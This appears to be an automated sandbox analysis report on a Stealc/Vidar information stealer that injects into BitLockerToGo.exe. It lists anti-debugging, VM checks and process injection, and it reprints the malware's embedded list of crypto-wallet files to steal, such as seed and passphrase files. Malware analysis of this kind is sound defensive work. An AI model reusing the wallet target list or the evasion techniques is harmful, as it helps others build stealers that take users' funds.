Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_02764570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0275ED20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767ED0 GetSystemInfo,wsprintfA, 1_2_02767ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1839715866.00000000008EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareq
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0276B33A
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027545C0 VirtualProtect ?,00000004,00000100,00000000 1_2_027545C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_02769860
Contains functionality to read the PEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769750 mov eax, dword ptr fs:[00000030h] 1_2_02769750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02760250 strtok_s,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,strtok_s,lstrlen,memset, 1_2_02760250
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276CEEA SetUnhandledExceptionFilter, 1_2_0276CEEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0276B33A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0276AD48
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6C82B66C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6C82B1F7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6C9DAC62
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 value starts with: 4D5A Jump to behavior
Searches for specific processes (likely to inject)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_02769600
Writes to foreign memory regions
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 501008 Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2751000 Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 276E000 Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 277B000 Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29AC000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B341 cpuid 1_2_6C82B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_02767B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02768B60 GetSystemTime, 1_2_02768B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 1_2_02767850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 1_2_02767A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 